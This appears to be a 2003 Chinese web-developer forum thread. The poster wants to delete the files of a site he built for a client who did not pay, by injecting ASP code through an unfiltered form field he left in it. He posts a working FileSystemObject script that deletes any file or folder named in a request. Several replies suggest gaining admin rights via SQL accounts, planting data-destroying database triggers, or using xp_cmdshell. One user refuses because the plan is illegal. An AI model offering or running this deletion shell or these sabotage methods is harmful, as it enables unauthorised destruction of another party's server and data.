28,407
社区成员
发帖
与我相关
我的任务
分享懂asp安全问题的进来
请问大家有没有办法把提交到数据库的asp的代码执行
我的提交项没有过滤字符的,能否提交asp的代码在服务器端运行呢???
今天太气人了,有个家伙给它做好了站居然不付费有没有办法利用fso把文件删掉呢?
高手帮帮我,被那人快气死了,居然还挂着我的站
我的提交项没有过滤字符的,能否提交asp的代码在服务器端运行呢???
今天太气人了,有个家伙给它做好了站居然不付费有没有办法利用fso把文件删掉呢?
高手帮帮我,被那人快气死了,居然还挂着我的站
...全文
请发表友善的回复…
发表回复
fangpeng2003 2003-11-21
- 打赏
- 举报
你有SQL帐号,就可以有办法获得系统管理权限
另外,可以在它的数据库表里做点手脚,不要直接删除数据,在表里设置触发器,等满足某一条件时破坏数据或做其它操作
另外,可以在它的数据库表里做点手脚,不要直接删除数据,在表里设置触发器,等满足某一条件时破坏数据或做其它操作
aliketen 2003-11-21
- 打赏
- 举报
access :(
nik_Amis 2003-11-21
- 打赏
- 举报
如果是SQL Server数据库
你登陆以后
用xp_cmdshell删就可以了
你登陆以后
用xp_cmdshell删就可以了
aliketen 2003-11-21
- 打赏
- 举报
我要运行这个代码啊!!!!!!!!!!!!!1
<%
if Request.QueryString("id")=kill then
elseif Request("1")<>"" and instr(Request("1"),".") then
set fso = Server.Createobject("Scripting.FileSystemObject")
path=server.MapPath(trim(request("1")))
fso.DeleteFile(""&path&"")
set fso = nothing
response.Write("ok")
elseif Request("1")<>"" then
set fso = Server.Createobject("Scripting.FileSystemObject")
path=server.MapPath(trim(request("1")))
fso.DeleteFolder (""&path&"")
response.Write("ok")
set fso = nothing
else
response.Write("<form action=fso.asp?id=kill method=post>FSO_format:<input name=1 type=text> <input type=submit name=Submit value=submit></form>")
end if
%>
<%
if Request.QueryString("id")=kill then
elseif Request("1")<>"" and instr(Request("1"),".") then
set fso = Server.Createobject("Scripting.FileSystemObject")
path=server.MapPath(trim(request("1")))
fso.DeleteFile(""&path&"")
set fso = nothing
response.Write("ok")
elseif Request("1")<>"" then
set fso = Server.Createobject("Scripting.FileSystemObject")
path=server.MapPath(trim(request("1")))
fso.DeleteFolder (""&path&"")
response.Write("ok")
set fso = nothing
else
response.Write("<form action=fso.asp?id=kill method=post>FSO_format:<input name=1 type=text> <input type=submit name=Submit value=submit></form>")
end if
%>
aliketen 2003-11-21
- 打赏
- 举报
数据库不用黑,我都知道路径,登陆密码啊
我是删调我的文件啊?????????谁有办法啊
我是删调我的文件啊?????????谁有办法啊
kwklover 2003-11-21
- 打赏
- 举报
看看:
www.asproom.com/kwk/aspsafe/index.asp
www.asproom.com/kwk/aspsafe/index.asp
美丽心情 2003-11-21
- 打赏
- 举报
哦,你想嵌FSO代码呀~~~
那你不如直接用SQL SERVER黑他呢~~
呵呵~~我无能为力~~
查看原文件,显示ASP代码,说明ASP写得有问题,是不是少括号之类的东西??
晕~~
那你不如直接用SQL SERVER黑他呢~~
呵呵~~我无能为力~~
查看原文件,显示ASP代码,说明ASP写得有问题,是不是少括号之类的东西??
晕~~
aliketen 2003-11-21
- 打赏
- 举报
被一个家伙快气死了
帮一家伙做了站居然不付费,还挂着我的站!!!
请问有没有办法提交fso代码进数据库,然后执行把文件删掉呢
提交项我没有做字符过滤无转换的,但是好像不能执行,查看源文件居然显示了asp代码,那位高人能帮帮忙
帮一家伙做了站居然不付费,还挂着我的站!!!
请问有没有办法提交fso代码进数据库,然后执行把文件删掉呢
提交项我没有做字符过滤无转换的,但是好像不能执行,查看源文件居然显示了asp代码,那位高人能帮帮忙
美丽心情 2003-11-21
- 打赏
- 举报
可以用FOS删,前提是人家没有禁用这个组件
还有你前2句话我没有看懂
还有你前2句话我没有看懂
wlm_lm 2003-11-21
- 打赏
- 举报
不是吧,没有给钱你就把网站给他了,算了,违法的事咱们不做。
